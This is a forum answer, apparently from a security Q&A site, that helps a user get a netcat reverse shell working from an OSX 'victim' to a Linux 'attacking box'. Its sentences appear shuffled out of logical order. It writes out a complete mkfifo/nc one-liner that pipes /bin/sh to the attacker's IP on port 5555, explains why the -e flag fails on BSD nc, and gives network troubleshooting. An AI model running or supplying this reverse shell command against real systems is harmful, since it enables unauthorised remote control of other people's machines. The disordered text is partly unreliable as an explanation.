However, if you're still having issues, you can check the remaining suggestions below. EDIT: As correctly notes, you don't want to use the IP address of the victim on your second nc command you should use the IP address of the attacking machine, which is what you want to connect back to. Your second example's syntax looks correct to me. The reverse shell is created differently due to the nc version on OSX being the BSD version, which does not support the -e flag. On your nc listener on your attacking box, you should see a shell open. OSX victim: rm /tmp/f mkfifo /tmp/f cat /tmp/f|/bin/sh -i 2>&1|nc $IP_OF_ATTACKING_BOX 5555 >/tmp/f I think what you actually want to do is something like this: If you do, that means that when you connect to the Linux machine on the port opened by nc, you'll get a shell spawned from the Linux machine, which doesn't seem to be what you want, since that's the attacking box. If that's the case, you don't need to use the -e flag on the Linux nc listener. You stated that your attacking machine is the Linux device and your OSX machine is the victim.
I think your issue in the first example stems from trying to use the -e flag in nc. What is your networking setup between the two machines in each example? Are you able to send other traffic between them, such as ICMP? If so, do you have any firewall rules configured on either of the devices that might interfere? If you're confident that your network setup is correct, then I've left some comments about each example below.